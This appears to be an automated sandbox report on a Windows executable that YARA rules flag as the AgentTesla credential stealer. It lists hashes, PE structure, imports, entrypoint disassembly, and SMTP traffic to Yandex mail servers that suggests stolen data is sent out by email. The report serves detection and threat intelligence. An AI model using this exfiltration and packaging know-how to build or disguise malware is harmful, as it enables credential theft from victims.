                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.7006690334145785
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                          MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                          SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                          SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                          SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Entropy (8bit):7.937396375196458
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:O53TFikPkp.exe
                                                                                          File size:271485
                                                                                          MD5:be56d049ee926fbccec623695d12a5c6
                                                                                          SHA1:1fa7ea2d0e348b7e1d79a7e6426e6f10376238e4
                                                                                          SHA256:626213dec6f5f7c552974fc4d9fe954cb70b94f03588aa4550cd545789034167
                                                                                          SHA512:571bf9c0c0ca1c70a71ff1c92bf8e0da04a27ee013097a770ad319165bab274f483adea5fc00dc78b4e1e88f10c3eb70eb64c338593360294cf4b8664eceb0f3
                                                                                          SSDEEP:6144:owsJm3jpsSbMcpJxUNhZfbn5Svf7AkjdOFIP6:B3lTbvpJqNj5af7DjAFIi
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

                                                                                          File Icon

                                                                                          Icon Hash:b2a88c96b2ca6a72

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x403225
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                          DLL Characteristics:
                                                                                          Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:099c0646ea7282d232219f8807883be0

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          sub esp, 00000180h
                                                                                          push ebx
                                                                                          push ebp
                                                                                          push esi
                                                                                          xor ebx, ebx
                                                                                          push edi
                                                                                          mov dword ptr [esp+18h], ebx
                                                                                          mov dword ptr [esp+10h], 00409128h
                                                                                          xor esi, esi
                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                          call dword ptr [00407030h]
                                                                                          push 00008001h
                                                                                          call dword ptr [004070B4h]
                                                                                          push ebx
                                                                                          call dword ptr [0040727Ch]
                                                                                          push 00000008h
                                                                                          mov dword ptr [00423F58h], eax
                                                                                          call 00007FAEB0CD1990h
                                                                                          mov dword ptr [00423EA4h], eax
                                                                                          push ebx
                                                                                          lea eax, dword ptr [esp+34h]
                                                                                          push 00000160h
                                                                                          push eax
                                                                                          push ebx
                                                                                          push 0041F450h
                                                                                          call dword ptr [00407158h]
                                                                                          push 004091B0h
                                                                                          push 004236A0h
                                                                                          call 00007FAEB0CD1647h
                                                                                          call dword ptr [004070B0h]
                                                                                          mov edi, 00429000h
                                                                                          push eax
                                                                                          push edi
                                                                                          call 00007FAEB0CD1635h
                                                                                          push ebx
                                                                                          call dword ptr [0040710Ch]
                                                                                          cmp byte ptr [00429000h], 00000022h
                                                                                          mov dword ptr [00423EA0h], eax
                                                                                          mov eax, edi
                                                                                          jne 00007FAEB0CCEE5Ch
                                                                                          mov byte ptr [esp+14h], 00000022h
                                                                                          mov eax, 00429001h
                                                                                          push dword ptr [esp+14h]
                                                                                          push eax
                                                                                          call 00007FAEB0CD1128h
                                                                                          push eax
                                                                                          call dword ptr [0040721Ch]
                                                                                          mov dword ptr [esp+1Ch], eax
                                                                                          jmp 00007FAEB0CCEEB5h
                                                                                          cmp cl, 00000020h
                                                                                          jne 00007FAEB0CCEE58h
                                                                                          inc eax
                                                                                          cmp byte ptr [eax], 00000020h
                                                                                          je 00007FAEB0CCEE4Ch
                                                                                          cmp byte ptr [eax], 00000022h
                                                                                          mov byte ptr [eax+eax+00h], 00000000h

                                                                                          Rich Headers

                                                                                          Programming Language:
                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x900.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                          .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0x2c0000x9000xa00False0.409375data3.94693169534IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                          RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                          RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                          RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                          RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                          RT_MANIFEST0x2c7100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                          Imports

                                                                                          DLLImport
                                                                                          KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                          USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                          SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 14, 2022 03:39:12.640427113 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:12.702661991 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:12.702799082 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:12.969264984 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:12.969578981 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.031738043 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.031784058 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.032092094 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.094244957 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.144457102 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.169887066 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.233504057 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.233565092 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.233608961 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.233643055 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.233741045 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.233824015 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.283977985 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.346339941 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.394463062 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.554766893 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.617073059 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.622107983 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.684242964 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.685511112 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.758352041 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.759191990 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.828363895 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.828902006 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.896285057 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.896718979 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.958669901 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:13.961158991 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.961252928 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.961954117 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:13.962029934 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:14.023521900 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:14.023869038 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:14.301125050 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:14.347603083 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:15.345776081 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:15.408023119 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:15.408072948 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:15.408171892 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:15.470020056 CET49803587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:15.524184942 CET5874980377.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:15.696842909 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:15.749696970 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:15.750267029 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.042094946 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.042336941 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.096849918 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.096930027 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.097151041 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.149956942 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.151098967 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.208024979 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.208069086 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.208101988 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.208125114 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.208189964 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.208240986 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.210980892 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.264277935 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.268340111 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.321290970 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.322027922 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.374800920 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.375380993 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.445894003 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.446538925 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.511137962 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.511740923 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.566800117 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.567167044 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.620017052 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.622200012 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.622549057 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.623003006 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.623359919 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.623719931 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.623960972 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.624140978 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.624342918 CET49807587192.168.2.477.88.21.158
                                                                                          Jan 14, 2022 03:39:16.675165892 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.676017046 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.676315069 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.676707983 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:16.722557068 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:17.023792982 CET5874980777.88.21.158192.168.2.4
                                                                                          Jan 14, 2022 03:39:17.066673994 CET49807587192.168.2.477.88.21.158

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 14, 2022 03:39:12.476604939 CET5662153192.168.2.48.8.8.8
                                                                                          Jan 14, 2022 03:39:12.493963957 CET53566218.8.8.8192.168.2.4
                                                                                          Jan 14, 2022 03:39:12.521090031 CET6311653192.168.2.48.8.8.8
                                                                                          Jan 14, 2022 03:39:12.540709019 CET53631168.8.8.8192.168.2.4
                                                                                          Jan 14, 2022 03:39:15.646847010 CET6407853192.168.2.48.8.8.8
                                                                                          Jan 14, 2022 03:39:15.666949987 CET53640788.8.8.8192.168.2.4
                                                                                          Jan 14, 2022 03:39:15.674953938 CET6480153192.168.2.48.8.8.8
                                                                                          Jan 14, 2022 03:39:15.695369959 CET53648018.8.8.8192.168.2.4

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          Jan 14, 2022 03:39:12.476604939 CET192.168.2.48.8.8.80x95e0Standard query (0)smtp.yandex.comA (IP address)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:12.521090031 CET192.168.2.48.8.8.80xbd24Standard query (0)smtp.yandex.comA (IP address)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:15.646847010 CET192.168.2.48.8.8.80x9b97Standard query (0)smtp.yandex.comA (IP address)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:15.674953938 CET192.168.2.48.8.8.80x548eStandard query (0)smtp.yandex.comA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          Jan 14, 2022 03:39:12.493963957 CET8.8.8.8192.168.2.40x95e0No error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:12.493963957 CET8.8.8.8192.168.2.40x95e0No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:12.540709019 CET8.8.8.8192.168.2.40xbd24No error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:12.540709019 CET8.8.8.8192.168.2.40xbd24No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:15.666949987 CET8.8.8.8192.168.2.40x9b97No error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:15.666949987 CET8.8.8.8192.168.2.40x9b97No error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:15.695369959 CET8.8.8.8192.168.2.40x548eNo error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)
                                                                                          Jan 14, 2022 03:39:15.695369959 CET8.8.8.8192.168.2.40x548eNo error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)

                                                                                          SMTP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                          Jan 14, 2022 03:39:12.969264984 CET5874980377.88.21.158192.168.2.4220 vla5-047c0c0d12a6.qloud-c.yandex.net ESMTP (Want to use Yandex.Mail for your domain? Visit http://pdd.yandex.ru) 1642127952-QQ7GqpzHRI-dCPe5Bo9
                                                                                          Jan 14, 2022 03:39:12.969578981 CET49803587192.168.2.477.88.21.158EHLO 088753
                                                                                          Jan 14, 2022 03:39:13.031784058 CET5874980377.88.21.158192.168.2.4250-vla5-047c0c0d12a6.qloud-c.yandex.net
                                                                                          250-8BITMIME
                                                                                          250-PIPELINING
                                                                                          250-SIZE 53477376
                                                                                          250-STARTTLS
                                                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                                                          250-DSN
                                                                                          250 ENHANCEDSTATUSCODES
                                                                                          Jan 14, 2022 03:39:13.032092094 CET49803587192.168.2.477.88.21.158STARTTLS
                                                                                          Jan 14, 2022 03:39:13.094244957 CET5874980377.88.21.158192.168.2.4220 Go ahead
                                                                                          Jan 14, 2022 03:39:16.042094946 CET5874980777.88.21.158192.168.2.4220 myt5-cceafa914410.qloud-c.yandex.net ESMTP (Want to use Yandex.Mail for your domain? Visit http://pdd.yandex.ru) 1642127956-YBrbW5xT92-dFPq8SOr
                                                                                          Jan 14, 2022 03:39:16.042336941 CET49807587192.168.2.477.88.21.158EHLO 088753
                                                                                          Jan 14, 2022 03:39:16.096930027 CET5874980777.88.21.158192.168.2.4250-myt5-cceafa914410.qloud-c.yandex.net
                                                                                          250-8BITMIME
                                                                                          250-PIPELINING
                                                                                          250-SIZE 53477376
                                                                                          250-STARTTLS
                                                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                                                          250-DSN
                                                                                          250 ENHANCEDSTATUSCODES
                                                                                          Jan 14, 2022 03:39:16.097151041 CET49807587192.168.2.477.88.21.158STARTTLS
                                                                                          Jan 14, 2022 03:39:16.149956942 CET5874980777.88.21.158192.168.2.4220 Go ahead

                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Start time:03:37:17
                                                                                          Start date:14/01/2022
                                                                                          Path:C:\Users\user\Desktop\O53TFikPkp.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\O53TFikPkp.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:271485 bytes
                                                                                          MD5 hash:BE56D049EE926FBCCEC623695D12A5C6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.667167111.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.667167111.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:low

                                                                                          General

                                                                                          Start time:03:37:18
                                                                                          Start date:14/01/2022
                                                                                          Path:C:\Users\user\Desktop\O53TFikPkp.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\O53TFikPkp.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:271485 bytes
                                                                                          MD5 hash:BE56D049EE926FBCCEC623695D12A5C6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.665781318.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.665781318.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.924721394.0000000003631000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.924721394.0000000003631000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.923015296.0000000000549000.00000004.00000020.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.923015296.0000000000549000.00000004.00000020.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.923951407.0000000002631000.00000004.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000001.666315289.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000001.666315289.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.665066940.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.665066940.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.924840687.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.924840687.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.923912577.00000000025E0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.923912577.00000000025E0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
